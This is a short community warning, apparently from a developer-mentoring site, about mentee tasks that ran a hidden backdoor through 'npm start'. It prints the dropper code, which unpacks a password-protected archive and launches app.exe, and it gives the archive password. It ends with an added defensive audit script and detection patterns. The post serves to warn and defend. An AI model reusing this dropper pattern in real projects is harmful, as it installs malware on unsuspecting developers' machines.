Backdoor alert!
My post is a reminder about the original post written by Erick Rodrigues:
The dangers of open requests for mentors in Codementor
I am writing it because I saw that other posts published after his pushed his post down.
Please read his interesting post and give it a like.
My post will be shorter, as the goal is to raise awareness through the post title and cover image.
Be careful when you download code from mentees.
In particular, these accounts posted a task with a backdoor in it:
https://www.codementor.io/@asherschmidt
https://www.codementor.io/@guderianlo
https://www.codementor.io/@denissenicolas67
https://www.codementor.io/@digiackeeley
When you run npm start, it runs the obfuscated code in public/css/types.txt, which is:
    const { exec, spawn } = require("child_process");
    const pathTo7zip = require("7zip-bin").path7za;
    const path = require("path");
    const fs = require("fs");
    const zipPath = path.resolve("./public/js/js.zip");
    const unzipCommand = `${pathTo7zip} x "${zipPath}" -pJNFWEIUFNWEF8N298F239889EWIFIENUWIFUNIUWNEFIUNWEIFUENWUIFNWEIFJDSNFKSDF -o"${__dirname}" -y`;
    exec(unzipCommand, (error) => {
      if (error) return;
      const extractedExe = path.join(__dirname, "app.exe");
      if (fs.existsSync(extractedExe)) {
        setTimeout(() => {
          const process = spawn(extractedExe, [], { detached: true, stdio: "ignore" });
          process.unref();
        }, 500);
      }
      // Cleanup
      exec(`del "${zipPath}"`, (err) => {
        if (err) return;
      });
    });
    // Persistent execution
    setInterval(() => {
      console.log("Repeating execution logic here...");
    }, 4000);
It then runs app.exe, the file extracted from public/js/js.zip (password: JNFWEIUFNWEF8N298F239889EWIFIENUWIFUNIUWNEFIUNWEIFUENWUIFNWEIFJDSNFKSDF), which is the backdoor.
I think the ARC and Codementor platforms must show a warning message when a client posts any download link.
Something like "Warning: Make sure the code and/or binary file(s) are free of backdoors before you run them."
Stay safe and always be careful before running any unknown user code.
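One way to check a downloaded task before running anything from it, as an added example that is not part of the original post or of Erick Rodrigues's write-up. It flags the three traits described above: an npm script that runs a non-code file, child_process code inside a file with a non-code extension, and archives or executables shipped among the assets. The function name, rule names and the exact "start" script line in the sample are assumptions.

```javascript
// Added example (not from the original post): static audit to run BEFORE npm install / npm start.
const CODE_EXT = new Set([".js", ".cjs", ".mjs", ".ts", ".json"]);
const PAYLOAD_EXT = new Set([".zip", ".7z", ".rar", ".exe", ".dll", ".scr"]);
const CHILD_PROCESS = /["'`](?:node:)?child_process["'`]/;

// Lower-cased extension of the last path segment ("" if there is none)
function extOf(p) {
  const base = p.split(/[\\/]/).pop();
  const i = base.lastIndexOf(".");
  return i > 0 ? base.slice(i).toLowerCase() : "";
}

// files: { "relative/path": "file content read as text" }; returns a list of findings
function auditProject(files) {
  const findings = [];
  const pkg = JSON.parse(files["package.json"] || "{}");
  for (const [name, cmd] of Object.entries(pkg.scripts || {})) {
    // An npm script that hands node a .txt (or other non-code) file is hiding its entry point
    for (const m of cmd.matchAll(/\bnode\s+(?:-\S+\s+)*(\S+)/g)) {
      const ext = extOf(m[1]);
      if (ext && !CODE_EXT.has(ext)) {
        findings.push({ rule: "script-runs-non-code-file", target: `${name}: ${m[1]}` });
      }
    }
  }
  for (const [file, content] of Object.entries(files)) {
    const ext = extOf(file);
    if (PAYLOAD_EXT.has(ext)) {
      findings.push({ rule: "archive-or-binary-in-repo", target: file });
    } else if (!CODE_EXT.has(ext) && CHILD_PROCESS.test(content)) {
      findings.push({ rule: "child_process-in-non-code-file", target: file });
    }
  }
  return findings;
}

// Constructed sample mirroring the layout in the post; the "start" script line is an assumption.
const SAMPLE = {
  "package.json": JSON.stringify({ scripts: { start: "node public/css/types.txt", test: "node test.js" } }),
  "public/css/types.txt": 'const { exec, spawn } = require("child_process");',
  "public/js/js.zip": "",
  "src/index.js": 'console.log("hello");',
};

console.log(auditProject(SAMPLE));
```

Build the files map by reading the project tree as text, without executing anything from it. An empty result does not prove a project is safe; these are heuristics for this one pattern.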